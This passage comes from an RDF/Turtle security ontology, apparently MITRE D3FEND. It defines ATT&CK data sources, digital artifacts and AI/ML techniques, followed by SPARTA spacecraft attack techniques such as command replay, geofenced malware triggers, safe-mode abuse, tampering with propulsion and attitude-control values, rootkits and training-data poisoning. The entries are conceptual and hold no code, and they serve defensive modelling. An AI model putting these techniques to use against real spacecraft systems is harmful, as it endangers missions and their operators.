hosted on-premise or by third-party cloud providers" ; rdfs:comment "This data source currently has no mappings to digital artifacts." . d3f:DS0032 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Container (ATT&CK DS)" ; d3f:definition "A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another" ; rdfs:comment "This data source captures events relating to containers and therefore has no direct mappings to digital artifacts." . d3f:DS0033 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Network Share (ATT&CK DS)" ; d3f:definition "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)" ; rdfs:comment "This data source captures events relating to shared network resources and therefore has no direct mappings to digital artifacts." . d3f:DS0034 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Volume (ATT&CK DS)" ; d3f:definition "Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives" ; rdfs:comment "This data source currently has no mappings to digital artifacts." . d3f:DS0035 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Internet Scan (ATT&CK DS)" ; d3f:definition "Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet" ; rdfs:comment "This data source currently has no mappings to digital artifacts." . d3f:DS0036 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Group (ATT&CK DS)" ; d3f:definition "A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights" ; d3f:exactly d3f:UserGroup ; rdfs:comment "The digital artifact mapping for this data source is only applicable to the Group Metadata component" . d3f:DS0037 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Certificate (ATT&CK DS)" ; d3f:definition "A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications" ; rdfs:comment "This data source captures events relating to certificates and therefore has no direct mappings to digital artifacts." . d3f:DS0038 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Domain Name (ATT&CK DS)" ; d3f:definition "Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)" ; rdfs:comment "This data source currently has no mappings to digital artifacts." . d3f:DS0039 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Asset (ATT&CK DS)" ; d3f:definition "Data sources with information about the set of devices found within the network, along with their current software and configurations" ; d3f:exactly d3f:AssetInventoryAgent . d3f:DS0040 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Operational Database (ATT&CK DS)" ; d3f:definition "Operational databases contain information about the status of the operational process and associated devices, including any measurements, events, history, or alarms that have occurred" ; rdfs:comment "This data source currently has no mappings to digital artifacts." . d3f:DS0041 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "Application Vetting (ATT&CK DS)" ; d3f:broader d3f:CodeAnalyzer ; d3f:definition "Application vetting report generated by an external cloud service." . d3f:DS0042 a d3f:ATTACKEnterpriseDataSource, owl:NamedIndividual ; rdfs:label "User Interface (ATT&CK DS)" ; d3f:definition "Visual activity on the device that could alert the user to potentially malicious behavior." ; rdfs:comment "This data source currently has no mappings to digital artifacts, but may be updated in future releases." . d3f:DataAcquisitionUnit a owl:Class, owl:NamedIndividual ; rdfs:label "Data Acquisition Unit" ; d3f:definition "The hardware component which connects to data sources to gather raw, time-stamped data. It often connects to databases or historian gateways for storage and analysis." ; d3f:may-contain d3f:DataAcquisitionAgent ; rdfs:seeAlso ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-contain ; owl:someValuesFrom d3f:DataAcquisitionAgent ], d3f:HardwareDevice . d3f:DataArtifactServer a owl:Class ; rdfs:label "Data Artifact Server" ; d3f:definition "A data artifact server provides access services to content in a content repository. The content repository or content store is a database of digital content with an associated set of data management, search and access methods allowing application-independent access to the content, rather like a digital library, but with the ability to store and modify content in addition to searching and retrieving. The content repository acts as the storage engine for a larger application such as a content management system or a document management system, which adds a user interface on top of the repository's application programming interface." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ArtifactServer . d3f:DataLinkLink a owl:Class ; rdfs:label "Data Link Link" ; d3f:definition "A communication link between two network devices connected directly at the physical layer and on the same network segment; i.e., an OSI Layer 2 link." ; d3f:synonym "Data Link Layer Link", "Layer-2 Link", "Link Layer Link" ; rdfs:seeAlso ; rdfs:subClassOf d3f:LogicalLink . d3f:DatabaseServer a owl:Class, owl:NamedIndividual ; rdfs:label "Database Server" ; d3f:contains d3f:DatabaseApplication ; d3f:definition "A database server is a server which uses a database application that provides database services to other computer programs or to computers, as defined by the client-server model. Database management systems (DBMSs) frequently provide database-server functionality, and some database management systems (such as MySQL) rely exclusively on the client-server model for database access (while others e.g. SQLite are meant for using as an embedded database). For clarification, a database server is simply a server that maintains services related to clients via database applications." ; rdfs:isDefinedBy ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:contains ; owl:someValuesFrom d3f:DatabaseApplication ], d3f:Server ; skos:altLabel "Network Database Resource" . d3f:Datalog a owl:Class, owl:NamedIndividual ; rdfs:label "Datalog" ; d3f:d3fend-id "D3A-DAT" ; d3f:definition "Datalog is a declarative logic programming language that is a syntactically a subset of Prolog." ; d3f:kb-article """## How it works Datalog generally uses a bottom-up rather than top-down evaluation model. This difference yields significantly different behavior and properties from Prolog. It is often used as a query language for deductive databases. Datalog has been applied to problems in data integration, networking, program analysis, and more. ## References 1. Datalog. (2023, April 20). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Datalog)""" ; rdfs:subClassOf d3f:LogicProgramming . d3f:DecisionTreeRegression a owl:Class, owl:NamedIndividual ; rdfs:label "Decision Tree Regression" ; d3f:d3fend-id "D3A-DTR" ; d3f:definition "Decision Trees Regression is asupervised learning method with the goal to create a model that predicts the value of a target variable by learning simple decision rules inferred from the data features" ; d3f:kb-article """## References scikit-learn. (n.d.). Decision Trees. [Link](https://scikit-learn.org/stable/modules/tree.html#tree)""" ; rdfs:subClassOf d3f:RegressionAnalysisLearning . d3f:DecoderApplication a owl:Class ; rdfs:label "Decoder Application" ; d3f:definition "An application that decodes digital data." ; rdfs:subClassOf d3f:CodecApplication . d3f:DeepConvolutionalGAN a owl:Class, owl:NamedIndividual ; rdfs:label "Deep Convolutional GAN" ; d3f:d3fend-id "D3A-DCG" ; d3f:definition "Deep Convolutional GAN (DCGAN) uses convolutional and convolutional-transpose layers in the generator and discriminator, respectively." ; d3f:kb-article """## References Analytics Vidhya. (2021). Deep Convolutional Generative Adversarial Network (DCGAN) for Beginners. [Link](https://www.analyticsvidhya.com/blog/2021/07/deep-convolutional-generative-adversarial-network-dcgan-for-beginners/)""" ; d3f:synonym "DCGAN" ; rdfs:subClassOf d3f:ImageSynthesisGAN . d3f:DeepQ-learning a owl:Class, owl:NamedIndividual ; rdfs:label "Deep Q-learning" ; d3f:d3fend-id "D3A-DQL" ; d3f:definition "Uses a deep convolutional neural network, with layers of tiled convolutional filters to mimic the effects of receptive fields." ; d3f:kb-article """## References Q-learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Q-learning#Deep_Q-learning).""" ; rdfs:subClassOf d3f:Q-Learning . d3f:Density-weightedMethod a owl:Class, owl:NamedIndividual ; rdfs:label "Density-weighted Method" ; d3f:d3fend-id "D3A-DWM" ; d3f:definition "An Actvie Learning technique that uses a density estimate meta-parameter to avoid sampling sparsely populated regions of the feature space and can be based parametrically or from a parameter free model." ; d3f:kb-article """## References Intro to Active Learning. inovex Blog. [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).""" ; rdfs:subClassOf d3f:ActiveLearning . d3f:DeonticLogic a owl:Class, owl:NamedIndividual ; rdfs:label "Deontic Logic" ; d3f:d3fend-id "D3A-DL" ; d3f:definition "Deontic logic addresses the modality of obligations and norms; i.e., the modality of morality." ; d3f:kb-article """## References 1. Deontic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Deontic_logic)""" ; rdfs:subClassOf d3f:ModalLogic . d3f:DesktopComputer a owl:Class ; rdfs:label "Desktop Computer" ; d3f:definition "A desktop computer is a personal computer designed for regular use at a single location on or near a desk or table due to its size and power requirements. The most common configuration has a case that houses the power supply, motherboard (a printed circuit board with a microprocessor as the central processing unit (CPU), memory, bus, and other electronic components, disk storage (usually one or more hard disk drives, solid state drives, optical disc drives, and in early models a floppy disk drive); a keyboard and mouse for input; and a computer monitor, speakers, and, often, a printer for output. The case may be oriented horizontally or vertically and placed either underneath, beside, or on top of a desk." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:PersonalComputer . d3f:DialUpModem a owl:Class ; rdfs:label "Dial Up Modem" ; d3f:definition "A dial-up modem transmits computer data over an ordinary switched telephone line that has not been designed for data use. This contrasts with leased line modems, which also operate over lines provided by a telephone company, but ones which are intended for data use and do not impose the same signaling constraints. The modulated data must fit the frequency constraints of a normal voice audio signal, and the modem must be able to perform the actions needed to connect a call through a telephone exchange, namely: picking up the line, dialing, understanding signals sent back by phone company equipment (dial tone, ringing, busy signal,) and on the far end of the call, the second modem in the connection must be able to recognize the incoming ring signal and answer the line." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Modem . d3f:DifferentialVolumeSnapshot a owl:Class ; rdfs:label "Differential Volume Snapshot" ; d3f:definition "A differential volume snapshot is a point-in-time capture of the files and directories that were changed since the last full snapshot." ; rdfs:seeAlso ; rdfs:subClassOf d3f:VolumeSnapshot . d3f:DigitalAccessBadge a owl:Class, owl:NamedIndividual ; rdfs:label "Digital Access Badge" ; d3f:definition "A credential used to gain entry to an area having automated access control entry points. Example media being magnetic stripe, proximity, barcode, or smart cards are examples." ; d3f:operates d3f:ElectronicCombinationLock ; d3f:synonym "CAC", "Common Access Card", "PIV", "Personal Identity Verification" ; rdfs:seeAlso , ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:operates ; owl:someValuesFrom d3f:ElectronicCombinationLock ], d3f:Credential . d3f:DigitalAudio a owl:Class ; rdfs:label "Digital Audio" ; d3f:definition "Digital audio is a representation of sound recorded in, or converted into, digital form." ; rdfs:isDefinedBy "https://dbpedia.org/page/Digital_audio" ; rdfs:subClassOf d3f:DigitalMedia . d3f:DigitalAudioVisualMedia a owl:Class ; rdfs:label "Digital Audio Visual Media" ; d3f:definition "Audiovisual (AV) is electronic media possessing both a sound and a visual component." ; rdfs:isDefinedBy "https://dbpedia.org/page/Audiovisual" ; rdfs:subClassOf d3f:DigitalMultimedia . d3f:DigitalDocument a owl:Class ; rdfs:label "Digital Document" ; d3f:definition "An digital document is any electronic media content (other than computer programs or system files) that is intended to be used in either an electronic form or as printed output." ; rdfs:isDefinedBy "https://dbpedia.org/page/Electronic_document" ; rdfs:subClassOf d3f:DigitalMedia . d3f:DigitalText a owl:Class ; rdfs:label "Digital Text" ; d3f:definition "Digital text is written content encoded in a digital format, allowing for storage, retrieval, and manipulation by electronic devices." ; rdfs:subClassOf d3f:DigitalMedia . d3f:DigitalVideo a owl:Class ; rdfs:label "Digital Video" ; d3f:definition "Digital video is an electronic representation of moving visual images (video) in the form of encoded digital data." ; rdfs:isDefinedBy "https://dbpedia.org/page/Digital_video" ; rdfs:subClassOf d3f:DigitalMedia . d3f:DiscriminantAnalysis a owl:Class, owl:NamedIndividual ; rdfs:label "Discriminant Analysis" ; d3f:d3fend-id "D3A-DA" ; d3f:definition "Discriminant analysis attempts to establish whether a set of variables can be used to distinguish between two or more groups of cases." ; d3f:kb-article """## References Wikipedia. (n.d.). Multivariate statistics. [Link](https://en.wikipedia.org/wiki/Multivariate_statistics)""" ; rdfs:subClassOf d3f:MultivariateAnalysis . d3f:DisplayDeviceDriver a owl:Class, owl:NamedIndividual ; rdfs:label "Display Device Driver" ; d3f:definition "A device driver for a display adapter." ; d3f:drives d3f:DisplayAdapter ; rdfs:seeAlso , ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:drives ; owl:someValuesFrom d3f:DisplayAdapter ], d3f:HardwareDriver . d3f:DivisiveClustering a owl:Class, owl:NamedIndividual ; rdfs:label "Divisive Clustering" ; d3f:d3fend-id "D3A-DC" ; d3f:definition "A divisive clustering approach is a hierarchical, top-down approach to clustering a dataset." ; rdfs:subClassOf d3f:HierarchicalClustering . d3f:Dyna-Q a owl:Class, owl:NamedIndividual ; rdfs:label "Dyna-Q" ; d3f:d3fend-id "D3A-DQ" ; d3f:definition "A Dyna-Q agent combines acting, learning, and planning." ; d3f:kb-article """## References CompNeuro Neuromatch Academy Tutorials. [Link](https://compneuro.neuromatch.io/tutorials/W3D4_ReinforcementLearning/student/W3D4_Tutorial4.html)""" ; rdfs:subClassOf d3f:Model-basedReinforcementLearning . d3f:DynamicAnalysisTool a owl:Class ; rdfs:label "Dynamic Analysis Tool" ; d3f:definition "Dynamic program analysis is the analysis of computer software that is performed by executing programs on a real or virtual processor." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:CodeAnalyzer . d3f:EX-0001.01 a owl:Class ; rdfs:label "Command Packets - SPARTA" ; d3f:attack-id "EX-0001.01" ; d3f:definition "Threat actors may interact with the victim spacecraft by replaying captured commands to the spacecraft. While not necessarily malicious in nature, replayed commands can be used to overload the target spacecraft and cause it's onboard systems to crash, perform a DoS attack, or monitor various responses by the spacecraft. If critical commands are captured and replayed, thruster fires, then the impact could impact the spacecraft's attitude control/orbit." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0001 ; skos:prefLabel "Command Packets" . d3f:EX-0001.02 a owl:Class ; rdfs:label "Bus Traffic Replay - SPARTA" ; d3f:attack-id "EX-0001.02" ; d3f:definition "Threat actors may abuse internal commanding to replay bus traffic within the victim spacecraft. On-board resources within the spacecraft are very limited due to the number of subsystems, payloads, and sensors running at a single time. The internal bus is designed to send messages to the various subsystems and have them processed as quickly as possible to save time and resources. By replaying this data, threat actors could use up these resources, causing other systems to either slow down or cease functions until all messages are processed. Additionally replaying bus traffic could force the subsystems to repeat actions that could affects on attitude, power, etc." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0001 ; skos:prefLabel "Bus Traffic Replay" . d3f:EX-0002 a owl:Class ; rdfs:label "Position, Navigation, and Timing (PNT) Geofencing - SPARTA" ; d3f:attack-id "EX-0002" ; d3f:definition "Threat actors may leverage the fact that spacecraft orbit through space unlike typical enterprise systems which are stationary. Threat actors can leverage the mobility of spacecraft to their advantage so the malicious code has a trigger based on spacecraft ephemeris to only execute when the spacecraft is within a certain location (within a countries boundary for example) that is often referred to as Geofencing. By using a Geofence an adversary can ensure that malware is only executed when it is needed. The relative or absolute position of the spacecraft could be combined with some form of timing to serve as the trigger for malware execution." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExecutionTechnique ; skos:prefLabel "Position, Navigation, and Timing (PNT) Geofencing" . d3f:EX-0003 a owl:Class ; rdfs:label "Modify Authentication Process - SPARTA" ; d3f:attack-id "EX-0003" ; d3f:definition "Threat actors may modify the internal authentication process of the victim spacecraft to facilitate initial access, recurring execution, or prevent authorized entities from accessing the spacecraft. This can be done through the modification of the software binaries or memory manipulation techniques." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExecutionTechnique ; skos:prefLabel "Modify Authentication Process" . d3f:EX-0004 a owl:Class ; rdfs:label "Compromise Boot Memory - SPARTA" ; d3f:attack-id "EX-0004" ; d3f:definition "Threat actors may manipulate boot memory in order to execute malicious code, bypass internal processes, or DoS the system. This technique can be used to perform other tactics such as Defense Evasion." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExecutionTechnique ; skos:prefLabel "Compromise Boot Memory" . d3f:EX-0005.01 a owl:Class ; rdfs:label "Design Flaws - SPARTA" ; d3f:attack-id "EX-0005.01" ; d3f:definition "Threat actors may target design features/flaws with the hardware design to their advantage to cause the desired impact. Threat actors may utilize the inherent design of the hardware (e.g. hardware timers, hardware interrupts, memory cells), which is intended to provide reliability, to their advantage to degrade other aspects like availability. Additionally, field programmable gate array (FPGA)/application-specific integrated circuit (ASIC) logic can be exploited just like software code can be exploited. There could be logic/design flaws embedded in the hardware (i.e., FPGA/ASIC) which may be exploitable by a threat actor." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0005 ; skos:prefLabel "Design Flaws" . d3f:EX-0005.02 a owl:Class ; rdfs:label "Malicious Use of Hardware Commands - SPARTA" ; d3f:attack-id "EX-0005.02" ; d3f:definition "Threat actors may utilize various hardware commands and perform malicious activities with them. Hardware commands typically differ from traditional command channels as they bypass many of the traditional protections and pathways and are more direct therefore they can be dangerous if not protected. Hardware commands are sometime a necessity to perform various actions such as configuring sensors, adjusting positions, and rotating internal motors. Threat actors may use these commands to perform malicious activities that can damage the victim spacecraft in some capacity." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0005 ; skos:prefLabel "Malicious Use of Hardware Commands" . d3f:EX-0006 a owl:Class ; rdfs:label "Disable/Bypass Encryption - SPARTA" ; d3f:attack-id "EX-0006" ; d3f:definition "Threat actors may perform specific techniques in order to bypass or disable the encryption mechanism onboard the victim spacecraft. By bypassing or disabling this particular mechanism, further tactics can be performed, such as Exfiltration, that may have not been possible with the internal encryption process in place." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExecutionTechnique ; skos:prefLabel "Disable/Bypass Encryption" . d3f:EX-0007 a owl:Class ; rdfs:label "Trigger Single Event Upset - SPARTA" ; d3f:attack-id "EX-0007" ; d3f:definition "Threat actors may utilize techniques to create a single-event upset (SEU) which is a change of state caused by one single ionizing particle (ions, electrons, photons...) striking a sensitive node in a spacecraft(i.e., microprocessor, semiconductor memory, or power transistors). The state change is a result of the free charge created by ionization in or close to an important node of a logic element (e.g. memory \"bit\"). This can cause unstable conditions on the spacecraft depending on which component experiences the SEU. SEU is a known phenomenon for spacecraft due to high radiation in space, but threat actors may attempt to utilize items like microwaves to create a SEU." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExecutionTechnique ; skos:prefLabel "Trigger Single Event Upset" . d3f:EX-0008.01 a owl:Class ; rdfs:label "Absolute Time Sequences - SPARTA" ; d3f:attack-id "EX-0008.01" ; d3f:definition "Threat actors may develop payloads or insert malicious logic to be executed at a specific time. In the case of Absolute Time Sequences (ATS), the event is triggered at specific date/time - regardless of the state or location of the target." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0008 ; skos:prefLabel "Absolute Time Sequences" . d3f:EX-0008.02 a owl:Class ; rdfs:label "Relative Time Sequences - SPARTA" ; d3f:attack-id "EX-0008.02" ; d3f:definition "Threat actors may develop payloads or insert malicious logic to be executed at a specific time. In the case of Relative Time Sequences (RTS), the event is triggered in relation to some other event. For example, a specific amount of time after boot." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0008 ; skos:prefLabel "Relative Time Sequences" . d3f:EX-0009.01 a owl:Class ; rdfs:label "Flight Software - SPARTA" ; d3f:attack-id "EX-0009.01" ; d3f:definition "Threat actors may abuse known or unknown flight software code flaws in order to further the attack campaign. Some FSW suites contain API functionality for operator interaction. Threat actors may seek to exploit these or abuse a vulnerability/misconfiguration to maliciously execute code or commands. In some cases, these code flaws can perpetuate throughout the victim spacecraft, allowing access to otherwise segmented subsystems." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0009 ; skos:prefLabel "Flight Software" . d3f:EX-0009.02 a owl:Class ; rdfs:label "Operating System - SPARTA" ; d3f:attack-id "EX-0009.02" ; d3f:definition "Threat actors may exploit flaws in the operating system code, which controls the storage, memory management, provides resources to the FSW, and controls the bus. There has been a trend where some modern spacecraft are running Unix-based operating systems and establishing SSH connections for communications between the ground and spacecraft. Threat actors may seek to gain access to command line interfaces & shell environments in these instances. Additionally, most operating systems, including real-time operating systems, include API functionality for operator interaction. Threat actors may seek to exploit these or abuse a vulnerability/misconfiguration to maliciously execute code or commands." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0009 ; skos:prefLabel "Operating System" . d3f:EX-0009.03 a owl:Class ; rdfs:label "Known Vulnerability (COTS/FOSS) - SPARTA" ; d3f:attack-id "EX-0009.03" ; d3f:definition "Threat actors may utilize knowledge of the spacecraft software composition to enumerate and exploit known flaws or vulnerabilities in the commercial or open source software running on-board the target spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0009 ; skos:prefLabel "Known Vulnerability (COTS/FOSS)" . d3f:EX-0010.01 a owl:Class ; rdfs:label "Ransomware - SPARTA" ; d3f:attack-id "EX-0010.01" ; d3f:definition "Threat actors may encrypt spacecraft data to interrupt availability and usability. Threat actors can attempt to render stored data inaccessible by encrypting files or data and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key or to render data permanently inaccessible in cases where the key is not saved or transmitted." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0010 ; skos:prefLabel "Ransomware" . d3f:EX-0010.02 a owl:Class ; rdfs:label "Wiper Malware - SPARTA" ; d3f:attack-id "EX-0010.02" ; d3f:definition "Threat actors may deploy wiper malware, which is a type of malicious software designed to destroy data or render it unusable. Wiper malware can spread through various means, software vulnerabilities (CWE/CVE), or by exploiting weak or stolen credentials." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0010 ; skos:prefLabel "Wiper Malware" . d3f:EX-0010.03 a owl:Class ; rdfs:label "Rootkit - SPARTA" ; d3f:attack-id "EX-0010.03" ; d3f:definition "Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. Rootkits or rootkit enabling functionality may reside at the flight software or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0010 ; skos:prefLabel "Rootkit" . d3f:EX-0010.04 a owl:Class ; rdfs:label "Bootkit - SPARTA" ; d3f:attack-id "EX-0010.04" ; d3f:definition "Adversaries may use bootkits to persist on systems and evade detection. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0010 ; skos:prefLabel "Bootkit" . d3f:EX-0011 a owl:Class ; rdfs:label "Exploit Reduced Protections During Safe-Mode - SPARTA" ; d3f:attack-id "EX-0011" ; d3f:definition "Threat actors who have access to a spacecraft in safe mode may issue malicious commands that would not normally be accepted during nominal operations. Safe-mode is when all non-essential systems are shut down and only essential functions within the spacecraft are active. Because safe mode prioritizes essential functions and often disables non-critical protections or filters, adversaries can exploit this state to trigger unauthorized reconfiguration, software modification, or system manipulation during recovery or degraded operation." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAExecutionTechnique ; skos:prefLabel "Exploit Reduced Protections During Safe-Mode" . d3f:EX-0012.01 a owl:Class ; rdfs:label "Registers - SPARTA" ; d3f:attack-id "EX-0012.01" ; d3f:definition "Threat actors may target the internal registers of the victim spacecraft in order to modify specific values as the FSW is functioning or prevent certain subsystems from working. Most aspects of the spacecraft rely on internal registries to store important data and temporary values. By modifying these registries at certain points in time, threat actors can disrupt the workflow of the subsystems or onboard payload, causing them to malfunction or behave in an undesired manner." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Registers" . d3f:EX-0012.02 a owl:Class ; rdfs:label "Internal Routing Tables - SPARTA" ; d3f:attack-id "EX-0012.02" ; d3f:definition "Threat actors may modify the internal routing tables of the FSW to disrupt the work flow of the various subsystems. Subsystems register with the main bus through an internal routing table. This allows the bus to know which subsystem gets particular commands that come from legitimate users. By targeting this table, threat actors could potentially cause commands to not be processed by the desired subsystem." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Internal Routing Tables" . d3f:EX-0012.03 a owl:Class ; rdfs:label "Memory Write/Loads - SPARTA" ; d3f:attack-id "EX-0012.03" ; d3f:definition "Threat actors may utilize the target spacecraft's ability for direct memory access to carry out desired effect on the target spacecraft. spacecraft's often have the ability to take direct loads or singular commands to read/write to/from memory directly. spacecraft's that contain the ability to input data directly into memory provides a multitude of potential attack scenarios for a threat actor. Threat actors can leverage this design feature or concept of operations to their advantage to establish persistence, execute malware, etc." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Memory Write/Loads" . d3f:EX-0012.04 a owl:Class ; rdfs:label "App/Subscriber Tables - SPARTA" ; d3f:attack-id "EX-0012.04" ; d3f:definition "Threat actors may target the application (or subscriber) table. Some architectures are publish / subscribe architectures where modifying these tables can affect data flows. This table is used by the various flight applications and subsystems to subscribe to a particular group of messages. By targeting this table, threat actors could potentially cause specific flight applications and/or subsystems to not receive the correct messages. In legacy MIL-STD-1553 implementations modifying the remote terminal configurations would fall under this sub-technique as well." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "App/Subscriber Tables" . d3f:EX-0012.05 a owl:Class ; rdfs:label "Scheduling Algorithm - SPARTA" ; d3f:attack-id "EX-0012.05" ; d3f:definition "Threat actors may target scheduling features on the target spacecraft. spacecraft's are typically engineered as real time scheduling systems which is composed of the scheduler, clock and the processing hardware elements. In these real-time system, a process or task has the ability to be scheduled; tasks are accepted by a real-time system and completed as specified by the task deadline depending on the characteristic of the scheduling algorithm. Threat actors can attack the scheduling capability to have various effects on the spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Scheduling Algorithm" . d3f:EX-0012.06 a owl:Class ; rdfs:label "Science/Payload Data - SPARTA" ; d3f:attack-id "EX-0012.06" ; d3f:definition "Threat actors may target the internal payload data in order to exfiltrate it or modify it in some capacity. Most spacecraft have a specific mission objectives that they are trying to meet with the payload data being a crucial part of that purpose. When a threat actor targets this data, the victim spacecraft's mission objectives could be put into jeopardy." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Science/Payload Data" . d3f:EX-0012.07 a owl:Class ; rdfs:label "Propulsion Subsystem - SPARTA" ; d3f:attack-id "EX-0012.07" ; d3f:definition "Threat actors may target the onboard values for the propulsion subsystem of the victim spacecraft. The propulsion system on spacecraft obtain a limited supply of resources that are set to last the entire lifespan of the spacecraft while in orbit. There are several automated tasks that take place if the spacecraft detects certain values within the subsystem in order to try and fix the problem. If a threat actor modifies these values, the propulsion subsystem could over-correct itself, causing the wasting of resources, orbit realignment, or, possibly, causing detrimental damage to the spacecraft itself. This could cause damage to the purpose of the spacecraft and shorten it's lifespan." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Propulsion Subsystem" . d3f:EX-0012.08 a owl:Class ; rdfs:label "Attitude Determination & Control Subsystem - SPARTA" ; d3f:attack-id "EX-0012.08" ; d3f:definition "Threat actors may target the onboard values for the Attitude Determination and Control subsystem of the victim spacecraft. This subsystem determines the positioning and orientation of the spacecraft. Throughout the spacecraft's lifespan, this subsystem will continuously correct it's orbit, making minor changes to keep the spacecraft aligned as it should. This is done through the monitoring of various sensor values and automated tasks. If a threat actor were to target these onboard values and modify them, there is a chance that the automated tasks would be triggered to try and fix the orientation of the spacecraft. This can cause the wasting of resources and, possibly, the loss of the spacecraft, depending on the values changed." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Attitude Determination & Control Subsystem" . d3f:EX-0012.09 a owl:Class ; rdfs:label "Electrical Power Subsystem - SPARTA" ; d3f:attack-id "EX-0012.09" ; d3f:definition "Threat actors may target power subsystem due to their criticality by modifying power consumption characteristics of a device. Power is not infinite on-board the spacecraft and if a threat actor were to manipulate values that cause rapid power depletion it could affect the spacecraft's ability to maintain the required power to perform mission objectives." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Electrical Power Subsystem" . d3f:EX-0012.10 a owl:Class ; rdfs:label "Command & Data Handling Subsystem - SPARTA" ; d3f:attack-id "EX-0012.10" ; d3f:definition "Threat actors may target the onboard values for the Command and Data Handling Subsystem of the victim spacecraft. C&DH typically processes the commands sent from ground as well as prepares data for transmission to the ground. Additionally, C&DH collects and processes information about all subsystems and payloads. Much of this command and data handling is done through onboard values that the various subsystems know and subscribe to. By targeting these, and other, internal values, threat actors could disrupt various commands from being processed correctly, or at all. Further, messages between subsystems would also be affected, meaning that there would either be a delay or lack of communications required for the spacecraft to function correctly." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Command & Data Handling Subsystem" . d3f:EX-0012.11 a owl:Class ; rdfs:label "Watchdog Timer (WDT) - SPARTA" ; d3f:attack-id "EX-0012.11" ; d3f:definition "Threat actors may manipulate the WDT for several reasons including the manipulation of timeout values which could enable processes to run without interference - potentially depleting on-board resources. For spacecraft, WDTs can be either software or hardware. While software is easier to manipulate there are instances where hardware-based WDTs can also be attacked/modified by a threat actor." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "Watchdog Timer (WDT)" . d3f:EX-0012.12 a owl:Class ; rdfs:label "System Clock - SPARTA" ; d3f:attack-id "EX-0012.12" ; d3f:definition "An adversary conducting a cyber attack may be interested in altering the system clock for a variety of reasons, such as forcing execution of stored commands in an incorrect order." ; rdfs:seeAlso ; rdfs:subClassOf d3f:EX-0012 ; skos:prefLabel "System Clock" . d3f:EX-0012.13 a owl:Class ; rdfs:label "Poison AI/ML Training Data - SPARTA" ; d3f:attack-id "EX-0012.13" ; d3f:definition "Threat actors may perform data poisoning attacks against the training data sets that are being used for artificial intelligence (AI) and/or machine learning (ML). In lieu of attempting to exploit algorithms within the AI/ML, data poisoning can also achieve the adversary's objectives depending on what they are. Poisoning intentionally implants incorrect correlations in the model by modifying the training data thereby preventing the AI/ML from performing effectively. For instance, if a threat 